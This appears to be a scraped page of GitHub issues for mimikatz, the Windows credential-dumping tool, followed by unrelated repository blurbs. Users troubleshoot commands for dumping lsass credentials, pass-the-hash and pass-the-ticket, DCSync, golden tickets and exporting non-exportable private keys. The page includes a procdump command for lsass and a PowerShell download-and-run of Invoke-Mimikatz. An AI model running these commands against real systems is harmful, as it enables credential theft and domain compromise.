gentilkiwi / mimikatz Goto Github PK
View Code? Open in Web Editor NEWA little tool to play with Windows security
Home Page: http://blog.gentilkiwi.com/mimikatz
A little tool to play with Windows security
Home Page: http://blog.gentilkiwi.com/mimikatz
How to create a Log at a specific location using a batch file?
I currently use "mimikatz.exe privilege::debug log sekurlsa::logonpasswords" and need a way to make to make the log save to U:/results/mimikatz.txt
See https://creativecommons.org/faq/#can-i-apply-a-creative-commons-license-to-software
I recommend to choose another license.
its there is a method to execute mimikatz with an application called deep freeze? can someone help me with this please ............................
on win8.1 32 bits the pattern for cng patch is
{0xf6, 0x43, 0x1c, 0x02, 0x75} but should be {0xf6, 0x47, 0x1c, 0x02, 0x75}
just patched it and it works well now.
i have not tested with win8.0 but maybe the two different patterns are linked to 32/64 bits instead of win8.0/win8.1 versions ?
Hello Benjamin,
I get the error "kull_m_memory_copy (0x00000005)" when trying to use PTH with Windows 10 Build 10.0.14393 (Windows 10 Enterprise). Credential dumping works as usual.
I attached the log file, thanks for any advice you can give.
mimi.txt
Best regards,
Christoph
Warning 2 warning C4996: 'wcsicmp': The POSIX name for this item is deprecated. Instead, use the ISO C++ conformant name: _wcsicmp. See online help for details. G:\mimikatz\mimikatz\modules\kuhl_m_sid.c 263 1 mimikatz
and i solve with this... adding _CRT_NONSTDC_NO_DEPRECATE to preprocessor definitions.
this happens only in VS2013 ? thank you!
and thank u for ur excellent work!!!
Salut Benjamin,
it seems that mimikatz 2.1 from 06 May stopped working on windows 10 systems with activated Virtual Secure Mode and current patch sets installed.
To be precise, the commands "logonpasswords" and "msv" have become broken.
We obtain an endless list of values for the LSA Isolated Data attribute "Encrypted", or alternatively a crash popup "mimikatz for Windows has stopped working".
We tried it with a Microsoft Surfacebook (with TPM 2.0)
Windows 10 Enterprise (US) version 1511
OS Version: 10586.0 and 10586.318
LsaIso Version: 10.0.586.0 and 10.0.10586.212
At the end we used the newest Windows Patch:
May 10, 2016 — KB3156421 (OS Build 10586.318)
This update includes quality improvements and security fixes. No new operating system features are being introduced in this update. Key changes include:
Fixed additional security issues with kernel mode drivers, remote procedure calls, the Microsoft Graphics Component, Internet Explorer 11, Microsoft Edge, Windows Shell, Windows Journal,
Virtual Secure Mode, Schannel, and Jscript.
Greetings from Germany,
Jürgen
M
Following is a session transcript of mimikatz which triggers the crash popup:
.#####. mimikatz 2.1 (x64) built on May 6 2016 01:28:44
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 19 modules * * */
ERROR kull_m_busylight_devices_get ; CreateFile (deviceHandle) (0x00000020)
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 6164539 (00000000:005e103b)
Session : Interactive from 3
User Name : admin
Domain : COMPANY
Logon Server : DC1
Logon Time : 18.05.2016 13:17:47
SID : S-1-5-21-504569365-2122958605-3922303804-1108
msv :
[00000003] Primary
* Username : admin
* Domain : COMPANY
* LSA Isolated Data: lmHash)
߶??¤ðgAÆL4$?ð?k¨ø,¨è¬??À*�Ÿ¶p?r?ßç®�~V�ý 'ÆK¡ó?ó^è4 ±ö�-äb"£Ûæ
Unk-Key : 701857763ed94172143552903b20950a2fb1fc0488884e0d9ed4e1c3bc80ebd1838f736e3b7492dea90780caa6fd0100
Encrypted:
hello, i ran mimikatz on windows server 2008 and i can't fix that
mimikatz #privilege::debug
Privilege '20' OK
mimikatz # misc::skeleton
ERROR kuhl_m_misc_skeleton ; kull_m_process_getVeryBasicModuleInformationsForName (0x00000000)
i Got This error :
mimikatz # sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_nt5_init ; kull_m_memory_search
ERROR kuhl_m_sekurlsa_acquireLSA ; Local LSA library failed
Has a new version of Mimikatz been published recently?I expected it happen a long time.
Hi, When trying to run mimikatz through the Invoke-Mimikatz.ps1 on a normal cmd it works fine,
when trying to run it through a python script such as:
command = "powershell.exe -ExecutionPolicy unrestricted ; IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:1234/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
os.system(command)
It fails and gives me the following output:
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (May 20 2014 08:55:05)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 14 modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations
mimikatz(powershell) # exit
Bye!
Any help?
win10, it doesn't work. Can you fix it ?
Hi,
I am experimenting with sidhistory, but the sid module only seems to have the lookup and query function, the add and modify functions are missing in version 2.1 alpha 20160506.
or, what am I missing
Merci!
lsass.exe dump from Windows 2003 Server
procdump.exe -accepteula -o -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp"
mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
**ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (5) != MIMIKATZ_NT_MAJOR_VERSION (6)
I use 32 bit version for x86.
Tested on Windows 8.1 Update 1 dump.
kd:x86> .load c:\mimilib.dll
.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct 10 2014 01:53:29)
.## ^ ##. Windows build 9600
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
32.0: kd:x86> !process 0 0 lsass.exe
32.0: kd:x86>
Unable to read _LIST_ENTRY @ fffff80194eb10a0
Error 1 error LNK2001: unresolved external symbol __imp__IsCharAlphaNumericW@4
thanks!
mimikatz open in admin mode.. windows 8.1 x64
What i did wrong? I must extract this cert to sign over 2000 pdf :/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
"KeyIso" service patched
mimikatz # crypto::certificates /export
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'My'
0. Lucyna G Key Container : 7CCC75FA573611ED12C3BCB5FD80FB20E795C16E
Provider : cryptoCertum3 CSP - profil bezpieczny
Provider type : RSA_FULL (1)
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : NO
Key size : 2048
Public export : OK - 'CURRENT_USER_My_0_Lucyna GERROR kuhl_m_crypto_ex
portPfx ; PFXExportCertStoreEx (0x80090010)
Private export : KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFi
le (0x80090010)
mimikatz # crypto::capi
Local CryptoAPI patched
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
"KeyIso" service patched
mimikatz # crypto::certificates /export
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'My'
0. Lucyna G Key Container : 7CCC75FA573611ED12C3BCB5FD80FB20E795C16E
Provider : cryptoCertum3 CSP - profil bezpieczny
Provider type : RSA_FULL (1)
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : NO
Key size : 2048
Public export : OK - 'CURRENT_USER_My_0_Lucyna GERROR kuhl_m_crypto_ex
portPfx ; PFXExportCertStoreEx (0x80090010)
Private export : KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFi
le (0x80090010)
Running DCSync against domains that have been renamed ends with this message:
ERROR kuhl_m_lsadump_dcsync ; RPC Exception 0x00002191 (8593)
That error code stands for
The directory service cannot perform the requested operation because the servers involved are of different replication epochs (which is usually related to a domain rename that is in progress).
Probable cause: Mimikatz does not set the DRS_EXTENSIONS_INT::dwReplEpoch value, so it always defaults to 0. But each domain rename increments this counter on DCs and if the client and the server are not in the same epoch, the server simply refuses to send replication changes.
Possible solution: IDL_DRSBind should be called again with the epoch that the server returns in the first call, if it is not 0.
Hey everyone,
really nice program! Congrats and thank you very much!
Though, I'm getting an error on Windows 7:
When running privilege::debug
I'm getting "ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege <20> c0000061"
and when running `sekurlsa::logonpasswords" I'm getting "ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory <0x00...5>"
Is there any get around?
Hi Ben!
I wanted to start a discussion about how we might work together to separate the UX/Console code from the core library that makes up the Mimikatz functionality. From there, I aim to wrap up the core library as a Meterpreter extension (ie. the kiwi
extension that you already know!).
The reason I'm keen to do this here is because keeping the code in sync is a tough gig, especially given the rate at which you churn out features!
Are you open to teaming up and working on teasing the bits apart a little so that it's easier for us poor MSF folk to keep your latest and greatest stuff in Metasploit?
Cheers for all your awesome work, as always.
Hi all,
Is there any official documentation? Is there any appetite to create one?
One unofficial can be found in adsecurity blog.
Cheers,
Andreas
Link is:
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
Learn many from this,thank you so much!
And a little advice:
Installation and configuration of OpenSSL is very troublesome.
And I think there is an easier way:)
We can use cert2spc.exe
and pvk2pfx.exe
.
They are all included in the Microsoft Windows SDK and can be run separately.
The code is:
cert2spc.exe B53C6DE283C00203587A03DD3D0BF66E16969A55.der public.spc
pvk2pfx.exe -pvk raw_exchange_capi_0_ffb75517-bc6c-4a40-8f8b-e2c555e30e34.pvk -pi test -spc public.spc -pfx cert.pfx -f
I hope you will like it~
del
Salut Benjamin,
we tried the newest builds of mimikatz 2.1 alpha 20160602 / 20160525
Windows 10 Build 10240 RTM: PTH ok; PTT not working
Windows 10 Build 10586 Version 1511: PTH not working; PTT not working
Windows 7 SP1 PTH ok; PTT ok
The output of mimikatz claims that everthing went "ok" in all six cases.
Greetings,
goldfinger2
i came across minikatz when looking for a method to retrieve a "non exportable" key from a windows computer. the anti virus software running on the computer i happened to be using to download mimikatz flagged the software as a virus. this isn't particularly compelling, but in the interest of self preservation, and somewhat on a whim, i decided to investigate a little more. i uploaded mimikatz.exe to virustotal, which reported this analysis:
i'm accustomed to the world of crappy anti virus software and constant false positives, but it was a bit surprising to see so many claiming mimikatz to be a trojan, rootkit, malware, etc., but not find any references to this in the various resources discussing its use.
is just an inevitable nuance, given the nature of this software, and happens to be little more than a coincidence? if nothing else, i thought the author[s]/community might be interested to know this [even if it's just for the sake of being informed on principle], assuming it's not something which has already been mentioned.
I'm playing around with Kerberos dumping and cracking. I'm starting mimikatz and running "standard::base64" so that all the .kirbi files get exported using base64 encoding. However once I execute "kerberos::list /export" using base64, there are no output files in my directory. Mimikatz only saves .kirbi files when I DON'T use base64 encoding.
Hey,
I have seen some clients increasingly detect golden ticket activity with mimikatz-generated tickets based on the event log login of a domain of "<3 eo.oe ~ ANSSI E>". I see that this value is hardcoded in located here:
Is there a reason that this is hardcoded instead of dynamic? A providable domain name would be awesome here
Hi Ben,
I just wonder if you could add support for passing command line parameters to the binaries executed by sekurlsa::pth. Or have I just missed this feature?
And thx again for your great work.
Hi @gentilkiwi ,
knowing that DCSync had problem with AD Recycle Bin being enabled, I tried it against a Windows Server 2016 TP5 DC with the Privileged Access Management Feature on, just out of curiosity. And guess what, it ends with error 8236 (The server does not support the requested critical extension), just as my own DSInternals does.
The solution will involve more than just fun with flags, as it was with DRS_EXT_RECYCLE_BIN, because the updated Doc states this: GR9 (DRS_EXT_GETCHGREPLY_V9, 0x00000100): If present, signifies that the DC supports DRS_MSG_GETCHGREPLY_V9. The DRS_MSG_GETCHGREPLY_V9 message basically adds link expiration timestamp to DRS_MSG_GETCHGREPLY_V6.
@asolino This issue most probably affects Impacket, too, though I cannot verify it right now.
Cheers
Michael
Erm hello I'm trying to get the password to a lappy running on windows 8.1,running on the current version of mimikatz on a 64bit
Before (windows 8) typing in Privilege::debug followed by sekurlas::Logonpasswords would work.
Now (windows 8.1) I'm getting a null for the password.
Could you help me by giving the commands to find the password for 8.1, please explain this to me I have no idea how any of this works.
Thanks.
1>kuhl_m_kerberos_ccache.obj : error LNK2001: external symbol RtlAnsiStringToUnicodeString unresolved
thanks
Salut Benjamin,
as we expect mimikatz 2.1 from 08 August don't work with the Windows 10 Build 1607 and Credential Guard
Windows 10 Enterprise (US) version 1607
OS Version: 14393.10
LsaIso Version: 10.0.14393.0
We attached the lsass dump file created by the taskmanager.
Greetings from Germany,
Jürgen
lsass-1607.zip
mimikatz How to Export Record?
Can you tell about it?
Hi,
I have a certificate with a private key marked as non-exportable. I use mimikatz to export the certificate:
mimikatz # crypto::certificates /export
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'My'
0. xxxxx
Key Container : !A42A9E45958D92C643D542A3C4B619AF21FC3CF7
Provider : Symantec PKI Client CSP
Provider type : RSA_FULL (1)
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : NO
Key size : 2048
Public export : OK - 'CURRENT_USER_My_0_ xxxxx.der'
Private export : OK - 'CURRENT_USER_My_0_ xxxxx.pfx'
I then use openssl to extract the public certificate and private key:
openssl pkcs12 -in my.pfx -out cert.pem -nokeys
openssl pkcs12 -in my.pfx -out key.pem -nocerts
The resulting cert.pem looks fine but key.pem has size 0. When I run:
certutil -user -store My
I get the following output:
My
================ Certificate 0 ================
Serial Number: 73f1964b9c30379490fa6db433e9ea96
Issuer: CN=xxxxx, O=xxxxx
NotBefore: 2/19/2016 4:00 PM
NotAfter: 2/19/2017 3:59 PM
Subject: OU=MULTI-ALLOWED, OU=RACERT, CN=xxxxx, CN=xxxxx
Non-root Certificate
Template:
Cert Hash(sha1): a4 2a 9e 45 95 8d 92 c6 43 d5 42 a3 c4 b6 19 af 21 fc 3c f7
Key Container = !A42A9E45958D92C643D542A3C4B619AF21FC3CF7
Provider = Symantec PKI Client CSP
Private key is NOT exportable
ERROR: Could not verify certificate public key against private key
CertUtil: -store command completed successfully.
Do you know why I cannot export the private key? Thanks.
Since this change.... 0666f21
KrbCredExport (https://github.com/rvazarkar/KrbCredExport) and "kirbikator" does not recognize golden tickets format, obviously generated with mimikatz
C:\Users\yo\mimikatz\x64>kirbikator ccache cid63212.kirbi
.#####. KiRBikator 1.1 (x86) built on Jan 18 2016 01:57:51
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com (oe.eo)
'#####' * * */
Destination : MIT Credential Cache (simple)
< cid63212.kirbi : format not recognized!
AND
C:\Users\yo\mimikatz\x64>KrbCredExport.py cid63212.kirbi cid63212.ccache
Ticket File Found, Converting to ccache
Traceback (most recent call last):
File "C:\Program Files (x86)\Python27\Scripts\KrbConvert.py", line 52, in <module>
KrbCred.parsefile(f)
File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 88, in parsefile
self.ticketpart.parsefile(f)
File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 57, in parsefile
self.encpart.parsefile(f)
File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 24, in parsefile
self.krbcredinfo.parsefile(f)
File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 300, in parsefile
self.starttime.parsefile(f)
File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 185, in parsefile
self.time = Time.convert_to_unix(strtime)
File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 170, in convert_to_unix
t = datetime.datetime.strptime(timestr[:-1], '%Y%m%d%H%M%S')
File "C:\Program Files (x86)\Python27\lib\_strptime.py", line 332, in _strptime
(data_string, format))
ValueError: time data "\x1c\xa7\xcc(A'\xfa\xef\xa0\x16\xb1*B\x95" does not match format '%Y%m%d%H%M%S'
C:\Users\yo\mimikatz\x64>python --version
Python 2.7.12
Windows 10 x64 ver 1511
thank you!!
Just curious about why Windows 10 passwords are showing up as null for I was trying to remember how you get around it showing null but forgot why again the password shows up null someone refresh my memory again.
Ran it as Admin had Smartscreen off and turned off Bit Defender but I think their was something you had to do to get it to show the password.
I try to use mimikatz on Windows 10 Pro N (Build 1511) on VirtualBox but it gives me the following error when i use privilege::debug
and can't begin my analysis
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
Hello Benjamin,
I'm facing a crash with the latest mimikatz when trying to export tickets from the sekurlsa
module on a Windows Server 2012 R2 Evaluation system.
The command I launched: mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
.
You can find here below:
systeminfo
.Crash_mimikatz_sekurlsa_tickets_export.zip
Cheers.
Thanks for the great tool 👍
I am unable to open generated log file when using "mimikatz 2.1 (x64) built on May 25 2016 00:19:15" as below, getting 'Access Denied' alert
However if I use it as below, I am able to open generated log file
mimikatz # log b5.txt
Using 'b5.txt' for logfile : OK
mimikatz # sekurlsa::minidump procdump_64_192.168.56.50.dmp
Switch to MINIDUMP : 'procdump_64_192.168.56.50.dmp'
mimikatz # sekurlsa::logonPasswords full
Opening : 'procdump_64_192.168.56.50.dmp' file for minidump...
Authentication Id : 0 ; 1665464 (00000000:001969b8)
Session : Interactive from 0
User Name : Administrator
The client machine on which I want to inject the TGT is non-domain joined system. getting this message after giving the needed command
http://s17.postimg.org/wyboxc8n3/123.png
What I am doing wrong?
Thanks.
First of all this seems to be a great tool, thanks.
When I try to export my certificate it is exported without the private key, which doesn´t help me.
System info: Windows 2008 Server R2 64bits
mimikatz 2.1 x64 (downloaded today)
At some point I get error:
ERROR kuhl_m_crypto_l_certificates ; CryptAcquireCertificatePrivateKey (0x80090011)
I made sure I opened command prompt using the "Run as Administrator" and went over UAC. Because of that I´m assuming I have ACL permissions on the private keys.
I am sure the key is not there because when I use openssl to verify pfx (openssl pkcs12 -info
) the BEGIN ENCRYPTED PRIVATE KEY
is not there. And when I try to extract the key to a .pem (openssl pkcs12 -in pfx -out pem
) the output file is empty.
Can you help?
Output (broken lines kept, sorry):
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
"KeyIso" service patched
mimikatz # crypto::capi
Local CryptoAPI patched
mimikatz # crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:My /export
* System Store : 'CERT_SYSTEM_STORE_LOCAL_MACHINE' (0x00020000)
* Store : 'My'
0. wantedCert.com
Key Container : {some_key}
Provider : Microsoft Enhanced Cryptographic Provider v1.0
Provider type : RSA_FULL (1)
ERROR kuhl_m_crypto_l_certificates ; CryptAcquireCertificatePrivateKey (0x80090011)
Public export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_wantedCert.com.der'
Private export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_wantedCert.com.pfx'
1. WMSvc-IISDefaultCertificate
Key Container : WMSvc Certificate Key Container
Provider : Microsoft RSA SChannel Cryptographic Provider
Provider type : RSA_SCHANNEL (12)
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : YES
Key size : 2048
Public export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_1_WMSvc-IISDefaultCertificate.der'
Private export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_1_WMSvc-IISDefaultCertificate.pfx'
On win 10, if you open mimikatz and try to get the passwords, you can not get it because it is impossible, I tryed with all: open like administrator,
-privileges::debug
"privilege 20 OK"
-sekurlsa::logonpasswords
"ERROR kuhl_m_sekurlsa_acquireLSA ; Modules Informations"
-lsadump::cache
"Domain: "
"Syskey: *******************"
"ERROR kuhl_m_lsadump_secretsOrCache ; kull_m_registry_regOpenKeyEx (SECURITY) (0x00000005)"
-lsadump::sam
"Domain: ***"
"Syskey: ****************************"
"ERROR kuhl_m_lsadump_getUsersandSamKey ; kull_m_registry_regOpenKeyEx SAM accounts (0x00000005)"
Pls getilkiwi help me.
I get an error when trying to patch CNG:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000005)
I tried to run mimikatz as Administrator and SYSTEM (via PsExec).
Hi,
I'd like to raise a feature request to support both English and French natively. I'd like to offer to spend the time to translate any french text to English. Is there a simple way to extract all text currently being used and to merge translations back in once done? Also happy to translate any documentation that is not yet in English.
Please let me know if this will be possible!
Cheers,
-T
Since Mimikatz is able to inject the ccache files generated in Linux, would it be possible to write a parser that can run under Linux to generate .kirbi files from the ccache file? I've tried to look into the code (kuhl_m_kerberos_ccache), but since nothing is commented I'm having a hard time to get into it.
Salut Benjamin,
the new mimikatz version from Aug 12 is working with Windows Build 1607 with and without Credential Guard. :-)
But we have a little issue together with Remote Credential Guard (RCG).
We used the following setup:
Source (RPC Client) Windows Build 1607 with Credential Guard protected
Target Windows Build 1607 without Credential Guard
We made a RPC-connection with the parameter "/remoteguard" to the target.
After running mimikatz on the target machine it will crash. (See attachments)
May be the problem is that the TGT-ticket on the target machine is a copy of the TGT-ticket of the source machine but without the session key. This is why the target must call back to the source to use his session key to decrypt the response from the TGS of the new service tickets.
Greetings from Germany
Juergen
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.